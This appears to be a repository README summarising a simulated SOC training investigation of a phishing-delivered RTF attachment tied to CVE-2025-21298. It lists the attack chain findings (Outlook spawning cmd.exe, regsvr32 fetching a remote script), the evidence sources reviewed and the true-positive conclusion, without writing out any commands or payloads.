This repository documents a simulated SOC investigation involving a phishing delivered malicious RTF attachment associated with CVE-2025-21298.
The investigation focuses on identifying the attack chain, analyzing endpoint telemetry, reviewing network activity, and correlating threat intelligence to determine whether the alert represents a true security incident.
The investigation began after a SOC alert indicated potential exploitation of a Windows OLE vulnerability. The alert suggested that a malicious RTF document may have triggered suspicious activity on the endpoint.
During the investigation, evidence revealed that the attachment was delivered via phishing email and later triggered suspicious command execution using regsvr32 to retrieve a remote script from an external server.
• Phishing email delivered malicious RTF attachment
• Attachment linked to CVE-2025-21298 exploit activity
• OUTLOOK.EXE spawned cmd.exe on the endpoint
• regsvr32 used to retrieve remote script (LOLBIN abuse)
• Outbound connection to malicious infrastructure detected
• Threat intelligence confirmed destination IP as malicious
The investigation included analysis of:
• Email security logs
• Endpoint process telemetry
• Network proxy logs
• Malware reputation analysis
• Threat intelligence data
Evidence confirms that the alert represents a true positive security incident.
The malicious RTF attachment triggered suspicious execution behavior and resulted in the retrieval of a remote script from attacker controlled infrastructure.
There is no evidence indicating that the malware was quarantined or removed from the endpoint.
This investigation was conducted in a controlled cybersecurity training environment.
The purpose of this repository is to demonstrate SOC investigation methodology and analytical reasoning.